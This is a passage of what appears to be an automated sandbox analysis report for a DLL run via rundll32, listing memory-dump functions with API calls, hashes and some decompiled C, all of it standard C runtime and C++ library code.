                                                      • Opcode ID: 7d0805965b04f062bc302cdea741f9b822db6388a6a7da55399e6315f3fbf0af
                                                      • Instruction ID: 8f15c9c104b917022e31f53d3a9495f89a7210dc9c62ff5960acf16197927bce
                                                      • Opcode Fuzzy Hash: 7d0805965b04f062bc302cdea741f9b822db6388a6a7da55399e6315f3fbf0af
                                                      • Instruction Fuzzy Hash: 2A11A3718006199FCF01DFE4DA58AFE77BDAF85714F100819E4146B2B0DF749A09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2A26, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2A2D
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2A37
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2A88
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2AA8
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2AC6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: bc1fb8d3c557484dce9891582c42fce5877ab26a766278f86e7da68253b1c280
                                                      • Instruction ID: 2a5ff00719ea25afd449995eaa76553f03163aea6bd20fe524af626df3021a6f
                                                      • Opcode Fuzzy Hash: bc1fb8d3c557484dce9891582c42fce5877ab26a766278f86e7da68253b1c280
                                                      • Instruction Fuzzy Hash: 2B119E329006198FCF01DFE4CA58AFE77BDAF89714F110818D814AB2B0DF749A09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2ACC, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2AD3
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2ADD
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2B2E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2B4E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2B6C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 9016cad32fb13094929bd01f5823274d194033451a9fa8dad74614dd9fa4c671
                                                      • Instruction ID: 93cec26e994b8faaea77d3d90d37d5c28afb54dded7b538231885a40de986332
                                                      • Opcode Fuzzy Hash: 9016cad32fb13094929bd01f5823274d194033451a9fa8dad74614dd9fa4c671
                                                      • Instruction Fuzzy Hash: D411A3319006199FCF01DFE4CAA8AEE77BDAF85714F140C18E5156B2B0DF749A09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2B72, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2B79
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2B83
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2BD4
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2BF4
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2C12
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 743a3123fb04879f78c1b3898b48b47dc1ad96546cc3fe99af5787aeff4619b6
                                                      • Instruction ID: 6e55fad0d5e67c45af78fa0a1684e4d285ab80c974c7231d501fb55310bbbedd
                                                      • Opcode Fuzzy Hash: 743a3123fb04879f78c1b3898b48b47dc1ad96546cc3fe99af5787aeff4619b6
                                                      • Instruction Fuzzy Hash: EB11A33180061A8FCF01DFE4CA58AFD77BDAF85718F100819E9156B2B0DF749A05DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C3487, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C348E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C3498
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C34E9
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C3509
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C3527
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 32d89a2cee06e2ac3b452702541c04e70d0d4476be69d86946d2d10fceff5a7d
                                                      • Instruction ID: 79b3260673472f255a786524373be543fef50270f18d9f020d63bc1e57184014
                                                      • Opcode Fuzzy Hash: 32d89a2cee06e2ac3b452702541c04e70d0d4476be69d86946d2d10fceff5a7d
                                                      • Instruction Fuzzy Hash: 321191319006199BCF01DFE4DA58AEDB7BDEF85724F100819D8156B2B0DF74AA05DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C352D, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C3534
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C353E
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C358F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C35AF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C35CD
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 58d6255e633ebabcb589fdafe51b06f3c65a221dd8373d490b876bf7ed261691
                                                      • Instruction ID: 1f4e68eed58344749fd38bde652413003073463ff80e9156f78a4c89ffedc9c4
                                                      • Opcode Fuzzy Hash: 58d6255e633ebabcb589fdafe51b06f3c65a221dd8373d490b876bf7ed261691
                                                      • Instruction Fuzzy Hash: 20118C318002199FCF01EFE4DA58AFE77BDAF85728F100858D814AB2B0DB749A099B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D0263, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7D026A
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7D0274
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7D02C5
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D02E5
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D0303
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: daa5ea2176d7e1995741bf046ec133296bc3a4e30b4a67283c89647a0e1e0895
                                                      • Instruction ID: 7ff15d812482df197c51a97aeef5820e79bd12e1e169be4c09275a422cba2591
                                                      • Opcode Fuzzy Hash: daa5ea2176d7e1995741bf046ec133296bc3a4e30b4a67283c89647a0e1e0895
                                                      • Instruction Fuzzy Hash: E711C271801219CBCF01DFE4CA58AFD77BAAF85328F100818D415AB2B0EF74AE09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C333B, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C3342
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C334C
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C339D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C33BD
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C33DB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: c23aa4ef498159f7a9f3503807b42506a1fcfa83b0c6df912d52100d16b74c20
                                                      • Instruction ID: df284d910cc2afc390f7c07763b6498abc5d6b9e907b032191a823c3d23b0b7c
                                                      • Opcode Fuzzy Hash: c23aa4ef498159f7a9f3503807b42506a1fcfa83b0c6df912d52100d16b74c20
                                                      • Instruction Fuzzy Hash: 9D11A3319006199FCF01DFE4DA58AFD777DAF85728F100818D8146B2B0DF74AA09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D0309, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7D0310
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7D031A
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7D036B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D038B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D03A9
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 15fb561ff6f6c004b35d1afdb2af059c680c1721c9bf4c4a60618ea355be1a89
                                                      • Instruction ID: d1da9a001d0c1b35591ef56a48db36f766f1aa7cc502674e17aa2a284c80e294
                                                      • Opcode Fuzzy Hash: 15fb561ff6f6c004b35d1afdb2af059c680c1721c9bf4c4a60618ea355be1a89
                                                      • Instruction Fuzzy Hash: 98117075900719DBCF01DFE4DA58AED77B9EF85324F140819D414AB2B0EF749A09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C33E1, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C33E8
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C33F2
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C3443
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C3463
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C3481
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: c5a25698c3ac28893470562937de54c47463939fc02c36fbd26ee9ed3724993d
                                                      • Instruction ID: 77f22468c920802284d20770318e9e5f15522607a67242cc75b8fd37a2a6d095
                                                      • Opcode Fuzzy Hash: c5a25698c3ac28893470562937de54c47463939fc02c36fbd26ee9ed3724993d
                                                      • Instruction Fuzzy Hash: CB11A0719006199FCF01DFE4DA58AFE77BDAF85718F140858D414AB2B0DF74AA09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D0071, Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7D0078
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7D0082
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7D00D3
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7D00F3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7D0111
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrow
                                                      • String ID:
                                                      • API String ID: 972686614-0
                                                      • Opcode ID: 92ea985e7cd4026d6fec4836b08209762c3917f028a1e5e4dcc21b4bda71c4f1
                                                      • Instruction ID: e601a28a4c821ff0ae054f1e3624f9ff21cf67c9fee9973a7a90725e348773bc
                                                      • Opcode Fuzzy Hash: 92ea985e7cd4026d6fec4836b08209762c3917f028a1e5e4dcc21b4bda71c4f1
                                                      • Instruction Fuzzy Hash: 7511C231800219DBCF01DFE4DA98AFD77BAAF85324F100818D414AB2B0EF74AA09DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F7DA5, Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000001,00000001,?,6E7EB2D2,6E7F9A33,?,?,6E7D5441,?,?,?,?,?,6E798A24,6E849074,?), ref: 6E7F7DAA
                                                      • _free.LIBCMT ref: 6E7F7DDF
                                                      • _free.LIBCMT ref: 6E7F7E06
                                                      • SetLastError.KERNEL32(00000000,6E849074), ref: 6E7F7E13
                                                      • SetLastError.KERNEL32(00000000,6E849074), ref: 6E7F7E1C
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 8ad508f1d5165c3778c68aeb2f229de4b3367be5f9b1596585e3e136cae36784
                                                      • Instruction ID: 0aaa464e7ebba68cb1dd5b46f9144d5e92084c4c19294f29135156118a00092b
                                                      • Opcode Fuzzy Hash: 8ad508f1d5165c3778c68aeb2f229de4b3367be5f9b1596585e3e136cae36784
                                                      • Instruction Fuzzy Hash: 8701F936574A03EB86029AE94F5DD9B222EDBC33757210D29F818923E5EF748D03C5A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FFB49, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 6E7FFB5F
                                                      • GetLastError.KERNEL32(?,?,?), ref: 6E7FFB69
                                                      • __dosmaperr.LIBCMT ref: 6E7FFB70
                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E7FFB8E
                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 6E7FFBB4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$ErrorLast__dosmaperr
                                                      • String ID:
                                                      • API String ID: 1114809156-0
                                                      • Opcode ID: d044be5f9996b16b130e9f2973686b3ae7d5d5f241379f168d919ab5526e9894
                                                      • Instruction ID: 42afa68b4c3b96fd0ba4fa506e7a44288c4e0161a8c768efe0c74e46e3d69e32
                                                      • Opcode Fuzzy Hash: d044be5f9996b16b130e9f2973686b3ae7d5d5f241379f168d919ab5526e9894
                                                      • Instruction Fuzzy Hash: D601233280121AEBCF119FE5CD288DE7F2DEF02760B204655B828A22A0DB318941DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7817A5, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E7817A5(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e78c800; // 0x6e78c850
					if(_t23 != 0) {
						E6E77D646(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e78c804; // 0x6e78d358
					if(_t24 != 0) {
						E6E77D646(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e78c808; // 0x6e78d358
					if(_t25 != 0) {
						E6E77D646(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e78c830; // 0x6e78c854
					if(_t26 != 0) {
						E6E77D646(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e78c834; // 0x6e78d35c
					if(_t27 != 0) {
						return E6E77D646(_t6);
					}
				}
				return _t6;
			}










                                                      0x6e7817ab
                                                      0x6e7817b0
                                                      0x6e7817b4
                                                      0x6e7817ba
                                                      0x6e7817bd
                                                      0x6e7817c2
                                                      0x6e7817c6
                                                      0x6e7817cc
                                                      0x6e7817cf
                                                      0x6e7817d4
                                                      0x6e7817d8
                                                      0x6e7817de
                                                      0x6e7817e1
                                                      0x6e7817e6
                                                      0x6e7817ea
                                                      0x6e7817f0
                                                      0x6e7817f3
                                                      0x6e7817f8
                                                      0x6e7817f9
                                                      0x6e7817fc
                                                      0x6e781802
                                                      0x00000000
                                                      0x6e78180a
                                                      0x6e781802
                                                      0x6e78180d

                                                      APIs
                                                      • _free.LIBCMT ref: 6E7817BD
                                                        • Part of subcall function 6E77D646: HeapFree.KERNEL32(00000000,00000000), ref: 6E77D65C
                                                        • Part of subcall function 6E77D646: GetLastError.KERNEL32(?,?,6E77CED9), ref: 6E77D66E
                                                      • _free.LIBCMT ref: 6E7817CF
                                                      • _free.LIBCMT ref: 6E7817E1
                                                      • _free.LIBCMT ref: 6E7817F3
                                                      • _free.LIBCMT ref: 6E781805
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 3e65586a10dd50748a294ccfea0a7add95a88a595a3956ebf8516c53d2f6a3e0
                                                      • Instruction ID: c6a3d5144954b9acb6b380e9c5452c56b49ca92ea5325e3727dc185ca265246a
                                                      • Opcode Fuzzy Hash: 3e65586a10dd50748a294ccfea0a7add95a88a595a3956ebf8516c53d2f6a3e0
                                                      • Instruction Fuzzy Hash: 02F062715046059B8E60DFE4E6D9C9733EDAA527617610C39F069DB624CB30F8808EE8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E805464, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 6E80547C
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      • _free.LIBCMT ref: 6E80548E
                                                      • _free.LIBCMT ref: 6E8054A0
                                                      • _free.LIBCMT ref: 6E8054B2
                                                      • _free.LIBCMT ref: 6E8054C4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 5bb62d1b5b1fbe02edd23c6241bf1d364b95ed00fe7cc9282f78f1bddcd082a3
                                                      • Instruction ID: 80d42987937c68d59489b99fac56518e5faa0a1024a238c74a96e697c314845d
                                                      • Opcode Fuzzy Hash: 5bb62d1b5b1fbe02edd23c6241bf1d364b95ed00fe7cc9282f78f1bddcd082a3
                                                      • Instruction Fuzzy Hash: E8F03C71904B06DB8A70EFD9EA95C9A37DDEA442717514C05E82CD7744CB24F981C6B4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778821, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 50%
                                                      			E6E778821(intOrPtr* _a4) {
				intOrPtr _t7;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;

				EnterCriticalSection(0x6e78c940);
				_t12 =  *0x6e78c000; // 0x80000003
				_t13 = _t12 + 1;
				 *0x6e78c000 = _t13;
				 *_a4 = _t13;
				_t14 =  *0x6e78ccac; // 0x0
				_t7 =  *0x6e78c000; // 0x80000003
				 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4)) = _t7;
				LeaveCriticalSection(0x6e78c940);
				_t19 = _t17;
				_push(_t19);
				_t20 =  *0x6e78c95c;
				if(_t20 == 0) {
					SetEvent( *0x6e78c93c);
					return ResetEvent( *0x6e78c93c);
				} else {
					 *0x6e785148(0x6e78c938);
					return  *_t20();
				}
			}










                                                      0x6e77882b
                                                      0x6e778831
                                                      0x6e77883a
                                                      0x6e77883b
                                                      0x6e778842
                                                      0x6e77884a
                                                      0x6e778853
                                                      0x6e778858
                                                      0x6e77885e
                                                      0x6e778864
                                                      0x6e7788bd
                                                      0x6e7788be
                                                      0x6e7788c6
                                                      0x6e7788df
                                                      0x6e7788f2
                                                      0x6e7788c8
                                                      0x6e7788cf
                                                      0x6e7788d8
                                                      0x6e7788d8

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(6E78C940,6E78D610,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224), ref: 6E77882B
                                                      • LeaveCriticalSection.KERNEL32(6E78C940,?,6E775DA7,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224,00000000), ref: 6E77885E
                                                      • RtlWakeAllConditionVariable.NTDLL ref: 6E7788D5
                                                      • SetEvent.KERNEL32(?,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224,00000000,000000A4,6E771174), ref: 6E7788DF
                                                      • ResetEvent.KERNEL32(?,6E78D610,9BBEF7A8,6E78D378,6E78D378,00000000,6E7846DB,000000FF,?,6E77651E,6E78D378,?,6E771224,00000000,000000A4,6E771174), ref: 6E7788EB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                      • String ID:
                                                      • API String ID: 3916383385-0
                                                      • Opcode ID: c94849275049515b98e7099e16efe99bc5c7b11b93fb7f77c84dbc553e0411ca
                                                      • Instruction ID: 299d666aa8b1580434d422498a4912441406c02c53ecee898329d6e5c30ee755
                                                      • Opcode Fuzzy Hash: c94849275049515b98e7099e16efe99bc5c7b11b93fb7f77c84dbc553e0411ca
                                                      • Instruction Fuzzy Hash: 8E01F635601A20DFDF059F68F958A9B3BA9FB2B35272542BAE9029B310CB305801CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77F42F, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E6E77F42F(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				void* _t228;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				signed int _t281;
				signed int _t284;
				signed int _t286;
				intOrPtr _t288;
				void* _t289;
				signed int* _t293;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t302;
				signed int _t303;
